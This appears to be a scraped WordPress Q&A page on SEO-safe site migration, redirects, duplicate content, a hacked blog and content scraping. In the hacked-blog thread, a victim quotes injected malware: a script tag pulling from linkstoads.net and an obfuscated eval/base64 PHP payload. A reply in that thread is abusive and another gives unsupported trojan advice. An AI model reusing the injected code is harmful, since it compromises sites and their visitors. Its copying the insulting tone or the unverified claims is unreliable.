How To Safely Migrate From Wordpress To Non-Wordpress - wordpress

I have a website that I made very quickly a while ago, using a WordPress theme. I completely forgot about it for a few months and checked the traffic for the first time today, and surprisingly it has been getting a lot of visitors and generated some income.
Currently the design is pretty horrible and I am 100% positive that if I re-design the website myself, I can get so many more visitors and conversions.
So I'm thinking about getting rid of WordPress and publish a new website using Bootstrap, and keep the same content and URL that I had.
But I'm scared that that would mess up my SEO and lose my organic rankings. I am on the first page of my main keyword and I would hate to lose this spot.
When a site goes through a design reconstruction, are there any specific steps that I should take? Should I just keep the WordPress site to be safe? Or am I worrying about something that won't even happen? I would love to hear any tips or feedback about this.

I have had recent experience of just this problem.
The URLs from the wordpress site are a commodity which is invested in search engine servers. Your ranking (which has taken time to accumulate) is in part dependant on preserving the URLs of the pages of your site.
You will ideally need to place a redirect (.htaccess file if using apache) from the old URL's to the new ones.
Rushing into commissioning a new site without reseaching this will cause you huge SEO loss that takes six months or more to recover from.
See this for more information.

Please take your time on this. I have too many companies call me on this when they screw it up.
Build out the new site on a test site that is not indexed, make sure it works, make sure the URL's are the same, test it.
Make sure you have a perfect htaccess file and I mean 100% perfect. Flip the new site on with the new and updated .hatccess file and the make sure your sitemap and robots.txt file are steller. Submit all of it to Google Webmaster and to Bing Webmaster Tools. If you change your URL's you are going back to the stone age. If you keep the URL's the same you will not see an issue.
-Matt

Related

link in WP not going to the right page

I'm working with WP on different subdomains, and for some reason a link on the landing page isn't going to the subdomain, but rather it's trying to go to a page that doesn't exist on the main domain level. I'm guessing this is some kind of auto direct issue, but the link is correct and I'm not sure what is causing this.
The main domain is in staging status: staging2.definingstudios.com. There are three links there, Lifestyle, Schools, and Commercial. The linnk to schools had been doing this too, but then it stopped and is working properly, but the Lifestyle one is trying to go elsewhere.
Thoughts?
Thanks,
Christine
This isn't a WP issue but generally an issue with the theme. They tend to save this data in the DB. A lot of the time its serialized and doesn't get updated.
You can do a few things. Search the DB and see if you can find it. Use a plugin to do it or 95% of the time just go into that page and update/save and it generally fixes it.

Lost all my sharing stats by purchasing a domain

I lost all the likes on my website on Wordpress then I bought the domain. It turns out that is the same site, but now no longer use the wordpress.com but .com (http://sobreasdeliciasdavida.com/).
Despite recent, my blog already had good statistics and the loss of more than 500 shares in Facebook brings my blog back to its beginning.
Can you offer the option of importing the likes to the new domain since the posts are the same?
Is there any way to do this?
Oftentimes when you move a well-established site, you'll want to set up a 301 redirect from the previous site. It's a permanent redirect that ensures that people following links to your previous site end up at your new one. I should point out, though, that your blog is far from taken back to its beginning. Remember, content is king, and you now have a site that's totally under your control and is already packed with great content, content that you know people respond to, like in social media venues, comment on, etc., etc. Don't worry about the 500 you might not get back because you certainly have thousands more on the way if you just keep doing what you're doing.
If you are directly using the facebook code in your website, then you can check this out. http://searchenginewatch.com/sew/how-to/2172926/maintain-social-shares-site-migration

Wordpress main website and mobile website duplicate content.

Basically a client has asked for his WordPress website to be turned into a mobile website as well. I have never attempted this and know nothing about SEO.
However the issue has arisen that this may cause duplicate content issues with Google, and therefore both sites may be dropped in the rankings.
I was looking at turning the website into a mobile site via one of the available WordPress mobile website plugins.
My question is if duplicate content will be an issue? Has anyone ever tried this?
After doing some reading I kind of think it may be possible to tell Google not to index the mobile website, although as I understand it It would be the same set of files. So I am unsure that if I tell it not to index one of them, that it will drop the other one as well.
Can anyone with WordPress and SEO knowledge clear this up for me?
In my opinion, if you have two indexed URLs with same text, there is duplicate content. And for Google, duplicate content is always an issue.
If you decide to no to index the mobile version of site, there will be not duplicate content because only one version of site will be indexed by Google.
Duplicate content is independent of your CMS (Wordpress), it's just a story about two indexed pages with same text.

A link to a linkstoads.net in my wordpress blog, probably a virus. How do i get rid of it?

Recently (last 2 weeks) this line of code appeared in the footer of a wordpress blog :
<script type="text/javascript" src="http://linkstoads.net/keller/link.php?id=3" name="linkstats"></script>
I did not put that here. I have no idea about what it does ; but I want it out.
For my first try, I just replaced the template and it was gone for a few minutes. But it came back.
So i got to my index.php file (not the template, the very first index.php) and found that code :
#c3284d#
eval(gzinflate(base64_decode("JcxLDoMwDEXROVL3EHkBeMCsfLqRTKxgKYE0WLFVtbsvkOnRe5dDPBxMGmoSc/YTnj0Yfw03+lBjD05rOD2ayRMxp7KrHbRqX9hw55y53tpLlFda5+G8FHpfrTYmUw/LhC24wPjo/g==")));
#/c3284d#
So I removed it, but it came back again the next day.
How is that possible ? I'm a newbie about viruses and security, so the answer may be really basic.
Congratulations! You have been hacked! Most likely you haven't haven't updated your software in quite some time and multiple hackers have exploited some well known vulnerability in your software.
How do you fix it? Scorched earth... You have been hacked by many bots, and probably sold online like some kind of whore. Delete your entire web root and start from scratch. Make sure you have the latest versions of every plugin and Wordpress.
For the record Wordpress was written by monkeys or children or children monkeys... Regardless it is by far one of the worst application I have ever hacked. They are probably still using your password hash as the session id, which means they don't even understand the basics of why you should hash passwords.
Oah if you keep getting hacked, higher a professional.
Problem solved, wordpress is not responsible for it.
There's a trojan that infect filezilla and when you open it, it'll inject code in every pages it can reach via filezilla.
This is really a big deal and 3 antiviruses could not even find it.
If you see that, format your computer.

How to prevent scraping my blog's updates?

I have a self-hosted wordpress blog, and as almost expected, I found there's another blog scraping my contents, posting a perfect copy of my own posts (texts, images not hotlinked but fetched and reupped to the clone's server, html layout within the posts) with a few hours of delay.
however I must confess I'm infuriated to see that when I search Google for keywords relevant to my posts, the scraping clone always comes first.
So, here I am, open for suggestions, would you know how to prevent my site from being successfully scraped ?
Technical precisions :
the clone blog appears to be self-hosted, and so am I, I'm on a debian+webmin+virtualmin dedi
my RSS feed is already cut with a "read more on" halfway. Hey, I just thought I should publish a post while assigning it a date like 2001-01-01, and see if it appears on the clone blog, that would allow to know if my RSS is still used as a signal for "hey, it's scraping time !"
my logs can't find the scraper among legit traffic, either it's non-identifiable or else it's lost among the flood of legit traffic
I already htaccess-banned and iptables-banned the .com domain of the clone, my contents are still cloned nonetheless
the clone website makes use of reverse proxies, so I can't trace where it is hosted and what actual IPs should be blocked (well, unless I iptables-ignore-ban half of Europe to ban the whole IP ranges of its data storage facility, but I'm slightly reluctant to that !)
I'm confident this isn't hand-made, the cloning has been running for two years now, every day without fail
only my new posts are cloned, not the rest of my website (not the sidebars, not the wordpress pages as opposed to wordpress posts, not the single pages), so setting up a jail.html to log who opens it page won't work, no honey-potting
when my posts contain internal links pointing to another page of my website, the posts on the clone won't be rewritten and will still point to my own website
I'd love help and suggestions with this issue. Not being cloned, but losing traffic to that bot while I'm the original publisher.
You can't really stop them in the end, but you might be able to find them and mess with them. Try hiding the request IP in an HTML comment, or white-on-white text, or just somewhere out of the way, then see what IPs show up on the copies. You can also try to obfuscate that text if you want by turning it into a hex string or something so it's less obvious to someone who doesn't know or make it look like an error code, just so they don't catch on to what you're doing.
In the end, though, I'm not sure how much it will buy you. If they're really inattentive, rather than shutting them down and calling attention to the fact that you're onto them, you can feed them gibberish or whatever whenever one of their IPs crops up. That might be fun and it's not too hard to make a gibberish generator by putting sample texts into a Markov chain.
EDIT: Oh, and if pages aren't rewritten too much, you might be able to add some inline JS to make them link to you, if they don't strip that. Say, a banner that only shows up if they're not at your site, giving the original link to your articles and suggesting that people read that.
Are you willing to shut down your RSS Feed? if so you could do something like
function fb_disable_feed() {
wp_die( __('No feed available,please visit our homepage!') );
}
add_action('do_feed', 'fb_disable_feed', 1);
add_action('do_feed_rdf', 'fb_disable_feed', 1);
add_action('do_feed_rss', 'fb_disable_feed', 1);
add_action('do_feed_rss2', 'fb_disable_feed', 1);
add_action('do_feed_atom', 'fb_disable_feed', 1);
it means if you go to a feed page, it just returns with the message in wp_die() on line two. We use it for 'free' versions of our WP Software with an if-statement so they can't hook into their RSS feeds to link to their main website, it's an upsell opportunity for us, it works well is my point, haha.
Even though this is a little old of a post, I thought it would still be helpful for me to weigh in in case other people see the post and have the same question. Since you've eliminated the RSS feed from the mix and youre pretty confident it isnt a manual effort, then what you need to is better stop the bots they are using.
First, I would recommend banning proxy servers in your IPTables. You can get a list of known proxy server addresses from Maxmind. This should limit their ability to anonymize themselves.
Second, it would be great to make it harder for them to scrape. You could accomplish this in one of a couple of ways. You could render part, or all of your site in javascript. If nothing else, you could at least just render the links in javascript. This will make it significantly harder for them to scrape you. Alternatively, you can put your content within an iframe inside the pages. This will also make it somewhat harder to crawl and scrape.
All this said, if they really want your content they will pretty easily get by these traps. Honestly, fighting off webscrapers is an arms race. You cannot put any static trap in place to stop them, instead you have to continuously evolve your tactics.
For full disclosure, I am a co-founder of Distil Networks, and we offer an anti-scraping solution as a service.

Resources